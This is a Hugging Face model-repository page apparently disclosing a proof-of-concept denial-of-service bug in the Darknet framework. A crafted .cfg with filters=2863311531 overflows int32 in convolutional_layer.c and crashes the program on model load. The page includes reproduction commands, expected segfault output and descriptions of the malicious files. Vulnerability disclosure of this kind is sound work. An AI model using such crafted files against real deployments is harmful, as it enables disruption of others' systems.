Hugging Face's logo

loowr
/
darknet-poc

darknet
security
poc
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Darknet Config Integer Overflow DoS

Integer overflow in src/convolutional_layer.c:195. A filters value in .cfg that overflows int32 causes undersized buffer allocation, NULL pointer dereference, crash.

Triggered on model load. No opt-in required.

Reproduce 

git clone https://github.com/pjreddie/darknet
cd darknet && make
./darknet partial malicious.cfg malicious.weights output 1

Expected 

conv  -1431655765  1 x 1 / 1    32 x  32 x   3   ->    32 x  32 x-1431655765
Loading weights from malicious.weights...Done!
Saving weights to output
Segmentation fault (core dumped)

Files

  • malicious.cfg -- filters=2863311531, overflows int32
  • malicious.weights -- 16-byte header, enough to reach the crash
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support